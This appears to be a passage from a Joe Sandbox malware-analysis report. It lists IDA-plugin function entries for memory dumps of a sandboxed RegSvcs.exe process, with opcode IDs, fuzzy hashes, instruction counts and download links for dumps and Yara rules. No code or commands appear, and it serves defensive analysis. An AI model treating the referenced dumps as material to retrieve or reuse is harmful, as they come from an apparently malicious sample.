Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction ID: 0f22fc9fc1c4d9c7d22deae0ab6f8558ef538ef1f7c551f8f884c729614f133b
Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction Fuzzy Hash: 70E0C2343003058FE755CF19C844B627BB6BFD5A10F28C0A8A9488F309EB32E882CB40

Function 0160CA38 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad0b90703866944a680638cb8545aea62cbf083805a0ad20a751d2e5ead8bfd9
Instruction ID: d0a0d242697012e6f2be39cc578afc8279a1d39ac9bd0743e97bcd3cd31fdf57
Opcode Fuzzy Hash: ad0b90703866944a680638cb8545aea62cbf083805a0ad20a751d2e5ead8bfd9
Instruction Fuzzy Hash: BBD02B324910216ECB3FE228BC04FA73A9AAB80320F0588E0F908D6091D518CCC182D4

Function 0162E1D8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fa6682665435e3bf81aac6b3c1c2a3abb7dabd95150390b2ab7a04d4b5ac629
Instruction ID: 5d9dd3730909bdf0477f25a6688b12297b41ab71fe29fd2acfa8d7a6806d02b8
Opcode Fuzzy Hash: 1fa6682665435e3bf81aac6b3c1c2a3abb7dabd95150390b2ab7a04d4b5ac629
Instruction Fuzzy Hash: FEE08C722155509FD201AA4CD880C3BF7EEFB88610F10065BF884D3611C2299E118BA0

Function 015C823B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dde1fb00fd2b926610cb540773fb9450d19403d8368e537e34001dc73afbaa9
Instruction ID: d59d8e7c49415e6b1e16c11f6da313d1b93c43f597cac3e6b01eebb3a8b2d666
Opcode Fuzzy Hash: 0dde1fb00fd2b926610cb540773fb9450d19403d8368e537e34001dc73afbaa9
Instruction Fuzzy Hash: F2E08C31400A21EEDB322E55DC18B5176E2FF94F10F24482DE0861E1A887B0A881DA48

Function 015C8C8D Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6a1cdd19ba1a5464da095337881f18fe8733fdfe244ff243a2ac1a8627d2a69
Instruction ID: 34ec9eafe199029a087b86a7d0c191d94a560cea5af5ed542782ef8cd65e13f3
Opcode Fuzzy Hash: e6a1cdd19ba1a5464da095337881f18fe8733fdfe244ff243a2ac1a8627d2a69
Instruction Fuzzy Hash: 6BE08C31412A21EEDB326F16DD04B9276E2BF50B21F15486DE0060E9A08BB4A885CA89

Function 015D2050 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c0e8250e86d34edb2c739fbda36afc689c273fd27c007ede4effb69ad0c70ce
Instruction ID: 23df083cdfad78cdf53e1fd2962bb15a23764906b54c48c885adc79ef03cf450
Opcode Fuzzy Hash: 3c0e8250e86d34edb2c739fbda36afc689c273fd27c007ede4effb69ad0c70ce
Instruction Fuzzy Hash: 81E0C2321005616BC321FB5EDD10F5A739EFFE4260F000121F1558B694CB70EC10C798

Function 01608A90 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction ID: 1501b41a2883d5faaf204b3ed6e713ba5fea8acc08ca63a36a06cf1ea6fba85e
Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction Fuzzy Hash: EBE08633511A1887C729DE18D911B7377A8EF45720F09463EAA13477C1C634E544C794

Function 015D2324 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30376b8f6942b512d21a7ff22882938c19e04cf1545c63af249bf3b6d6559961
Instruction ID: 41709911141b0c6b7761f0c2404de931b384425b13d7c62475c30c667a324861
Opcode Fuzzy Hash: 30376b8f6942b512d21a7ff22882938c19e04cf1545c63af249bf3b6d6559961
Instruction Fuzzy Hash: 6AE04631A008969FDB2AAB5DC954BAABBB2FF88300FA80499D805372A0CB345850CB54

Function 015CA740 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80a23e6447b73173346f2999f4b3a87c02860673b62991cded2a1bd378972dde
Instruction ID: 093ecc440e2b9dc14b7fe7ca5627a8bf7ab2d8668f4857fce1ec8b34f7b74da8
Opcode Fuzzy Hash: 80a23e6447b73173346f2999f4b3a87c02860673b62991cded2a1bd378972dde
Instruction Fuzzy Hash: D5E086305108A6EFDB26AB59CC58F9DBAB1BFC4704F040459E0052A560C724A890CF54

Function 01626AA4 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb32f8a4abc51be972f9ddb29922803d5ff50af5a24517df2a19369e20eb1f2c
Instruction ID: 64c285ad31954e731e48643f986a1c3c61773a3a4b270100a29146b9e9537a51
Opcode Fuzzy Hash: fb32f8a4abc51be972f9ddb29922803d5ff50af5a24517df2a19369e20eb1f2c
Instruction Fuzzy Hash: EFD05E36911A50AFC3329F1BEE04D13BBF9FFC4A10705066EE94683A20C770E806CBA0

Function 0160E59C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daaa7d3009ea744d07f9e08accc962f8ae29a2b4d64e956cf5d4d68ea4780215
Instruction ID: 8db3180c99d4511aebd581acab6ebef63df7708c02476e9663a2861fc76d25c3
Opcode Fuzzy Hash: daaa7d3009ea744d07f9e08accc962f8ae29a2b4d64e956cf5d4d68ea4780215
Instruction Fuzzy Hash: BAD0A932A64A20ABD772AA1CFC04FC333E8BB88724F060499B009CB150C360EC81CA84

Function 0164E908 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9a9a0ba620b78d8a2c60997a25aa35dfde848f9b98ee4321ba6aa288af4782
Instruction ID: 543d1e58dff7d50ac4ca6f9409ff2a79aabb9d4f13b578b91bfd016076b93ba0
Opcode Fuzzy Hash: ca9a9a0ba620b78d8a2c60997a25aa35dfde848f9b98ee4321ba6aa288af4782
Instruction Fuzzy Hash: 05E0EC359506859BDF66DF59CA44F5ABBF5FB94B40F150458A1085F660C729E900CB40

Function 015CA0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fae157940f5a138273a1c795e13f34e5419f85a62f40bfb8e3377858a39b448
Instruction ID: 9c8ab9e76f86fc253de8d91bd47716ccda1f12a0ff3c0afd712860b31b2a8cfc
Opcode Fuzzy Hash: 6fae157940f5a138273a1c795e13f34e5419f85a62f40bfb8e3377858a39b448
Instruction Fuzzy Hash: 80D022326220319BCB285A95AC04F676D45BFC0EE0F0A006C340BAB800C1048C42C2E0

Function 0160A830 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb8aa549dbf07f54bc0b203a27983cb9c38d34c775957e4477bfa26f88d2c7e
Instruction ID: 3ad9d6bd720b394802ab90b911d0c764295442333d37a8ddbba3bfcf5f89e6bf
Opcode Fuzzy Hash: 0eb8aa549dbf07f54bc0b203a27983cb9c38d34c775957e4477bfa26f88d2c7e
Instruction Fuzzy Hash: 92D012371E054DBBCB119F66DC01F957BA9FBA4BA0F444020B5098B5A0C63AE960D584

Function 0160CA24 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4fc0bf9a0c0b1776306cac4353504995bad58aa11d4df7929113a8628e7b499
Instruction ID: f013145d169007e0237e44c7cfb78ee8500323ea8036820ab41e97d94c062193
Opcode Fuzzy Hash: a4fc0bf9a0c0b1776306cac4353504995bad58aa11d4df7929113a8628e7b499
Instruction Fuzzy Hash: 81D09E349565129BDF1BDB59CD1497A7AB4FF54640B4001A8EA0156660D325D8618650

Function 015E02A0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction ID: 4437cab79a962e901dbf3b396a74b6232c81fb6e63e11826cbaac07e37a0bf38
Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction Fuzzy Hash: 86D0E935B56E80CFD61BCB5DC9A8B1973F4BB84B44F854490F541CBB62D66CD944CE40

Function 0160C700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4437e647b2b4e703394cfa8271e7a9dde31e81d5545b5ce8aedd04872345699a
Instruction ID: 57c760c6493f3b66af97f890ac709eec1365c6ab2dae7e725f4e154047c1ea6c
Opcode Fuzzy Hash: 4437e647b2b4e703394cfa8271e7a9dde31e81d5545b5ce8aedd04872345699a
Instruction Fuzzy Hash: 16C012322A0648AFC716AA99CD01F027BA9FBA8B40F000061F2098B670C631E820EA84

Function 015CE0D0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e2a8bb4569c32c7878f0edc046c3ea37dea16654d28b9ee0bbcbecabfa1896e
Instruction ID: ae251c26592c23d9c110461560116b59ee61baaa8f3e5d92e1d7f049eea97d01
Opcode Fuzzy Hash: 2e2a8bb4569c32c7878f0edc046c3ea37dea16654d28b9ee0bbcbecabfa1896e
Instruction Fuzzy Hash: FBC04CF3B10091AE8714DF619C05BB6658AE3E4611B56C06EB159C6248D93DC4119A65

Function 015F0310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 0d70b9a06fa1724c60ccee02c9efc27fa9bf8d9a2a247bf79566db3cc9fac88a
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: D2D01236140249EFCB01DF45C890D9A772BFBD8710F148019FD190B6518A31ED62DA50

Function 0160C7F0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a93b78b4f3aab30918e7eb6a748612c734bffc3b04e31a2f267280f2c313703
Instruction ID: 0794892a5156bb8e4f847dc784dcd44e009e339649258a5f5a17de355b1ffbbc
Opcode Fuzzy Hash: 2a93b78b4f3aab30918e7eb6a748612c734bffc3b04e31a2f267280f2c313703
Instruction Fuzzy Hash: 8EC002347016468FCF56CB69C688A5977E8BB85680B4944D0E804DB721D664EC019B00

Function 015D0750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

